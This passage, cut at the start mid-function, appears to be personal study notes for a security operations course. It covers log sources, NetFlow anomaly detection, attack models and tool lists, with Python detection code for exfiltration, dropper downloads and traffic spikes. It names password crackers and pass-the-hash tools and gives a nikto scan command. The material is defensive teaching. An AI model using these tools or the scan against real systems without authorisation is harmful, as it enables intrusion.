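    return {
        "time": to_utc(f[0]),
        "client": f[2],
        "status": int(f[3].split("/")[1]),
        "bytes": int(f[4]),
        "method": f[5],
        "url": f[6],
        "host": urlparse(f[6]).hostname,
    }


def status_class(code):
    return {2: "success", 3: "redirect", 4: "client_error", 5: "server_error"}.get(code // 100, "other")


def analyze(log_text):
    """Return (findings, status_summary) for the given log text."""
    posts = defaultdict(lambda: [0, 0])       # (client, host) -> [count, bytes]
    findings = []
    summary = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        e = parse_line(line)
        summary[status_class(e["status"])] += 1
        if e["host"] not in BAD_REPUTATION:
            continue
        if e["method"] == "POST":
            posts[(e["client"], e["host"])][0] += 1
            posts[(e["client"], e["host"])][1] += e["bytes"]
        elif e["method"] == "GET" and urlparse(e["url"]).path.lower().endswith(".exe"):
            findings.append((e["client"], "possible dropper download", e["host"], e["time"]))
    for (client, host), (count, total) in posts.items():
        if count >= POST_THRESHOLD:
            findings.append((client, "possible data exfiltration", host,
                             f"{count} POSTs, {total} bytes"))
    return findings, dict(summary)


if __name__ == "__main__":
    found, counts = analyze(LOG)
    print(counts)
    for f in found:
        print(*f)
```

Because the proxy only sees the URL and method of HTTPS requests when it decrypts them, both heuristics depend on the SSL/TLS inspection mentioned above; without it the log shows only CONNECT entries to the host.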
        9. Email Proxy Log
          1. DLP policy prevents users from sending out sensitive information;
        10. AAA Server Log
          1. handle both wired and wireless user requests with Authentication, Authorization and Accounting
        11. Next Generation Firewall Log
        12. Applications Log
          1. to verify that network and computer resources are being used appropriately / intentionally;
          2. /var/log or event viewer in Windows
        13. Packet Captures
          1. PCAP (Packet Capture) files: store complete frames, including the data link-layer headers
          2. analyst must be aware of potential privacy concerns
        14. NetFlow
          1. developed by Cisco for the collection and monitoring of network session data;
          2. Data such as identities of the systems involved in the conversation, the time of the communication, and the amount of data transferred
          3. Like “phone bill“, NetFlow provides a complete audit trail of all network communications
        15. Network Behavior Anomaly Detection
          1. Baselines are used in anomaly detection, and defines what is normal;
          2. Its validity and usefulness can be impaired if the size of the sliding window is not set appropriately
        16. Data Loss Detection Using Netflow Example
          1. monitor outbound traffic larger than specific size;
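The two ideas above, a fixed "outbound larger than X" rule and a baseline-driven anomaly check with a sliding window, as an added example (not course material and not any NetFlow collector's code): aggregation over constructed NetFlow-style records. The inside prefix, the hourly window, the thresholds and every flow record are made up for the example.

```python
# Added example (not from the course): flow-record analysis that applies the
# two ideas above, a fixed "outbound larger than X" rule and a sliding-window
# baseline that flags a host whose outbound volume deviates from its own past.
# Flow records, addresses, thresholds and the window size are constructed.
from collections import defaultdict
from statistics import mean, pstdev

INSIDE_PREFIX = "10.0.0."          # constructed: the internal network
BASE = 1507939200                  # constructed: 2017-10-14 00:00:00 UTC
HOUR = 3600

# Constructed NetFlow-style records: (start_ts, src, sport, dst, dport, proto, octets)
FLOWS = [
    (BASE + 0 * HOUR + 600, "10.0.0.5", 51000, "198.51.100.20", 443, 6, 2_000_000),
    (BASE + 1 * HOUR + 600, "10.0.0.5", 51001, "198.51.100.21", 443, 6, 2_100_000),
    (BASE + 2 * HOUR + 600, "10.0.0.5", 51002, "198.51.100.22", 443, 6, 1_900_000),
    (BASE + 3 * HOUR + 600, "10.0.0.5", 51003, "198.51.100.20", 443, 6, 2_050_000),
    (BASE + 4 * HOUR + 600, "10.0.0.5", 51004, "198.51.100.23", 443, 6, 1_950_000),
    (BASE + 5 * HOUR + 600, "10.0.0.5", 51005, "203.0.113.9", 443, 6, 300_000_000),  # the spike
    (BASE + 0 * HOUR + 900, "10.0.0.9", 52000, "198.51.100.30", 80, 6, 500_000),
    (BASE + 1 * HOUR + 900, "10.0.0.9", 52001, "198.51.100.30", 80, 6, 500_000),
    (BASE + 2 * HOUR + 900, "10.0.0.9", 52002, "198.51.100.30", 80, 6, 500_000),
    (BASE + 3 * HOUR + 900, "10.0.0.9", 52003, "198.51.100.30", 80, 6, 500_000),
    (BASE + 4 * HOUR + 900, "10.0.0.9", 52004, "198.51.100.30", 80, 6, 500_000),
    (BASE + 5 * HOUR + 900, "10.0.0.9", 52005, "198.51.100.30", 80, 6, 500_000),
    (BASE + 5 * HOUR + 700, "203.0.113.7", 40000, "10.0.0.5", 22, 6, 50_000_000),   # inbound, ignored
]


def outbound_per_window(flows, window=HOUR):
    """Sum octets per inside host per time window, outbound (inside -> outside) only."""
    per = defaultdict(lambda: defaultdict(int))
    for ts, src, _sport, dst, _dport, _proto, octets in flows:
        if src.startswith(INSIDE_PREFIX) and not dst.startswith(INSIDE_PREFIX):
            per[src][ts // window * window] += octets
    return per


def sliding_baseline_alerts(per_host, history=5, k=3.0, min_bytes=10_000_000, window=HOUR):
    """Flag a window whose volume exceeds mean + k*stddev of the previous `history` windows.

    Windows with no traffic count as zero so quiet hours do not shrink the history.
    min_bytes keeps a host with a flat, tiny baseline (stddev 0) from alerting on noise.
    """
    alerts = []
    for host, windows in per_host.items():
        lo, hi = min(windows), max(windows)
        series = [(start, windows.get(start, 0)) for start in range(lo, hi + window, window)]
        for i in range(history, len(series)):
            past = [octets for _, octets in series[i - history:i]]
            threshold = mean(past) + k * pstdev(past)
            start, current = series[i]
            if current > threshold and current > min_bytes:
                alerts.append((host, start, current, round(threshold)))
    return alerts


def large_transfers(flows, threshold_bytes=100_000_000):
    """The simple rule: total outbound bytes per (inside host, external peer) above a size."""
    totals = defaultdict(int)
    for _ts, src, _sport, dst, _dport, _proto, octets in flows:
        if src.startswith(INSIDE_PREFIX) and not dst.startswith(INSIDE_PREFIX):
            totals[(src, dst)] += octets
    return sorted((src, dst, n) for (src, dst), n in totals.items() if n > threshold_bytes)


if __name__ == "__main__":
    per = outbound_per_window(FLOWS)
    print("baseline alerts:", sliding_baseline_alerts(per))
    print("large transfers:", large_transfers(FLOWS))
```

The `history` parameter is the sliding window the notes warn about: with only one or two past windows the standard deviation is close to zero and almost any change alerts, while a very long history lets a slow, steady increase become part of "normal".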
        17. Security Information and Event Management Systems
          1. Correlation
        18. Explore Security Data for Analysis
        19. Challenge
      14. Describing Security Event Analysis
        1. Cyber Kill Chain
          1. model that describes the structure of an attack
          2. 7 stages
            1. Reconnaissance: Research, identify targets
            2. Weaponization: Coupling a remote access Trojan with an exploit
            3. Delivery: Transmission of the weapon to the target
            4. Exploitation: exploitation triggers intruders’ code
            5. Installation: installation of a remote access Trojan or backdoor
            6. Command and control
            7. Actions on objectives
          3. Usages
            1. Prioritize vast amount of security events data
            2. Set the escalation levels
            3. Determine the security controls that can be used to defend at the different stages
            4. Measure the effectiveness of the security controls
            5. Measure the security controls resiliency
            6. Measure analytic completeness
            7. Help to identify and group related intrusions into campaigns
          4. Benchmark: decrease time from compromise to discovery
        2. Advanced Persistent Threats
          1. Characteristics of APTs
            1. Pursues its objectives repeatedly over an extended period
            2. Adapts to defenders’ efforts to detect it
            3. Maintains a level of interactions with the attacker’s command and control
        3. Diamond Model for Intrusion Analysis
          1. Security analyst
            1. link together logs, events, and other meta-data by identifying patterns across massive data;
          2. framework by which an SOC team can organize and verify advanced persistent threats
          3. “For every intrusion event, there exists an adversary taking a step towards an intended goal by using a capability over infrastructure against a victim to produce a result.”
          4. Nodes in model
            1. Adversary: threat actor
            2. Capability: tools and/or techniques
            3. Infrastructure: physical and/or logical communication structures
            4. Victim: target
          5. Usage: analytical pivoting
        4. Cybersecurity Threat Models Summary
          1. Cyber Kill chain / APT / Diamond model
        5. SOC Runbook Automation
          1.  runbook, also known as playbook, typically contains a combination of workflows, tools, and processes;
          2. prescriptive collection of repeatable methods to detect and respond to security incidents;
          3. ensures that the responses can be changed and adapted in real time to detect and resolve security events efficiently
          4. collection of “plays,” and each play generates a report from some set of data sources
          5. a key strength of a runbook is its flexibility;
          6. SOC must build and use runbooks
        6. Malware Reverse Engineering
          1. clones the hard drive to a virtual environment to identify the issue;
          2. understanding how malware behaves, identify purposes and techniques;
        7. Chain of Custody
          1. chronological documentation or paper trail, showing the seizure, custody, control, transfer, analysis, and disposition of physical or electronic evidence
          2. document that describes the exact time that each person took possession of specific evidence
          3. custodian is responsible for storing the material in a location that no one else has access to
        8. Challenge
  4. Practices:
    1. Cisco simulators:
      1. Cisco Packet Tracer 7.0
      2. NetSim
    2. Tools:
      1. tcpdump
      2. wireshark
      3. Packets editor: WireEdit / Packet Editor;
      4. Build asset inventory list
      5. Cisco CLI Analyzer
      6. Open Sources Penetration testing:
        1. OpenVAS
        2. metasploit
      7. Password attack tools: Cain and Abel, John the Ripper, OphCrack, and L0phtCrack;
      8. Pass the Hash attack tools: Metasploit, PsExec, msvctl, Pass-The-Hash Toolkit;
      9. Nikto: powerful web vulnerability scanner that uses plugins
        1. nikto -h <target-host> > abc-report.txt (-h takes the target host; the redirect saves the text report)
      10. OWASP (Open Web Application Security Project).
    3. My Tools
      1. WireShark
      2. Zenmap
      3. Loki
      4. CVSS
      5. OpenSOC
      6. PuTTy: remote access, ssh connection
      7. WinSCP: transfer files.
      8. WireShark: capture traffic
      9. Sysinternals: contains 70 tools.
      10. OpenVAS (vulnerability scanner).
      11. Snort (open source IPS).
      12. SQUID. Open source web proxy server
      13. Virustotal.
      14. Security Onion (Linux w/ suite of tools for network security monitoring)
        1. Bro: powerful network analysis framework
        2. ELSA: centralized syslog framework
        3. OSSEC: open source host-based IDS
        4. Sguil: intuitive GUI (analyst console) for network security monitoring
        5. Snort: open source network IPS
        6. Squert: web application that is used to query and view event data that is stored in a Sguil database
        7. Suricata: open source next-generation intrusion detection and prevention engine
      15. Github, a large open source community
        1. YAML: incident response playbooks
      16. Metasploitable 2: for security training and test.
      17. Tools at 11.23 - Security Tools Reference
        1. Packet capture tools
          1. Cisco IOS Router and Cisco ASA: packet capture built into the device itself
          2. Netsniff-ng: a free Linux networking toolkit
          3. Sniffit: a distributed sniffer system
          4. tcpdump: a powerful command-line network packet analyzer for Linux
          5. TShark: the command-line network protocol analyzer of the Wireshark suite
          6. Wireshark: GUI network protocol analyzer
          7. Microsoft Message Analyzer: tool for capturing, displaying, and analyzing protocol messaging traffic
        2. Network scanners
          1. Nmap: free and open source utility for network discovery and security auditing
          2. OpenVAS: open source vulnerability-scanning suite
        3. Web testing tools
          1. Burp Suite: integrated platform for web application testing
          2. Nikto2: open source web server scanner
          3. OWASP Mantra: browser-based security framework
          4. OWASP Mutillidae II: free, open source, deliberately vulnerable web application
        4. Password crackers
          1. Cain and Abel: Windows-based password recovery tool
          2. John the Ripper: fast password cracker
          3. L0phtCrack: tool that is used to crack Windows passwords
          4. Ophcrack: free Windows password cracker that is based on rainbow tables
        5. Penetration testing tools
          1. BackTrack: free, bootable Linux distribution (predecessor of Kali Linux)
          2. Kali Linux: Debian-based Linux distribution for penetration testing
          3. Metasploit Framework: comprehensive exploitation tool set
        6. IPS/IDS
          1. Bro: network analysis framework
          2. OSSEC: open source host-based intrusion detection system
          3. Snort: open source network intrusion prevention system
          4. Suricata: open source next-generation intrusion detection and prevention engine
        7. Network security monitoring tools
          1. Security Onion: open source network security monitoring distribution
          2. Sguil: intuitive GUI for network security monitoring
          3. ELSA: centralized syslog framework
          4. Splunk Enterprise: platform for real-time operational intelligence
        8. Security intelligence tools
          1. Talos Intelligence Group: made up of leading threat researchers
          2. OWASP: open community for application security
          3. (name not captured): a repository of malware samples
          4. VirusTotal: multi-engine file and URL scanner, a subsidiary of Google
        9. SIEM
          1. AlienVault OSSIM
          2. OpenSOC
  5. References
    2. CCNA Security (210-260) by Systematic
    3. Google Security Research team (permanent)
    4. Search engine of IoT devices
    5. Protection guidelines for wifi/bluetooth connections & passwords
    6. Password generator
    7. Always read the terms of service from your service providers
    8. List of web sites that support 2-factor authentication
    9. Online port scanner
    10. NIST cybersecurity resources
    11. SANS Institute
    12. Worst Passwords 2015
    13. Top 10 web application vulnerabilities list
    14. Homoglyph Attack
      1. Homoglyph Attack Generator
    15. Windows commands reference
    16. Track information about public Internet presence
      1. What's that site running?
    17. Telnet to test SMTP communication
    18. OpenIOC (Indicator of Compromise)
  6. Actions:
    1. How to detect bot and rootkit;
    2. Firewall requirements;
    3. Prepare Security Playbook – prepare, gather and analyze security events;
    4. Snort
  7. Tasks in CY
    1. VLAN and routing
    2. secure switch ports
    3. MAC spoofing / ARP poisoning protection
    4. DHCP protection
    5. FW
      1. SYN flood protection
      2. stateful protection
      3. SMTP protection
  8. Exam:
    1. Terms such as cryptography used in X.509;
    2. Difference between resource-exhaustion and timing attacks against an IPS
    3. What should be included in NGFW?
